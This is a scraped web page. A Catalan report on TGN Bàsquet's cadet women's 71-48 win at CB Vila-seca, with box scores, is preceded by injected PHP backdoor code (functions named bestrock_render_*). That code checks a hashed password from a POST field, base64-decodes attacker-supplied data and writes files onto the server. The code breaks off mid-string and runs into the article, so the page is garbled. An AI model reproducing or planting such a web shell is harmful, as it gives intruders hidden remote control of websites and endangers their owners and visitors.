function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Victòria a Vilaseca! -

Victòria a Vilaseca!

Updated: novembre 14, 2022

Cinquè partit de la temporada del Cadet femení 08C i quarta victòria del curs a domicili contra el CB Vila-seca (48-71).

El TGN Bàsquet va començar adormit en els primers minuts, i aquest fet, va provocar que els locals es posessin per davant a l’electrònic amb un contundent parcial 11-0. Al minut 7 del partit, el conjunt lila va començar a entrar en ritme de partit i va anar de menys a més per acabar guanyant el matx.

El TGN Bàsquet es va situar  per davant en el marcador al minut 12 del partit per primera vegada i no va cedir les regnes fins al final. Gran partit coral de les tarragonines que continuen amb una ratxa molt positiva de 4 victòries i només una derrota en 5 jornades de lliga.

CB VILASECA 48 – TGN BÀSQUET 08C: 71
15-14 / 12-23 // 9-14 / 12-20

CB Vilaseca: Castro (19); Ibañez (); Del Arco (12); Gonzalez (3); Lema (6) – cinc inicial – Ortega (); Djelouidi (5); Bo (); Lancharro (3). Faltes 20 (Del Arco expulsada). LES XIFRES DEL PARTIT: Triples : Cap. Tirs Lliures : 12 / 25

Cadet femení 08C: Aguilar (3); Urbaneja (12); Gonzalbo (4); Aldecoa (14); Prades (8) – cinc inicial – Estevez; Esteve; Montesinos (5); Latorre (6); Meroño (7); Benaiges (8); Salas (4). Faltes: 26 (Aguilar expulsada).
LES XIFRES DEL PARTIT: Tirs Lliures : 6 / 17. Triples : Cap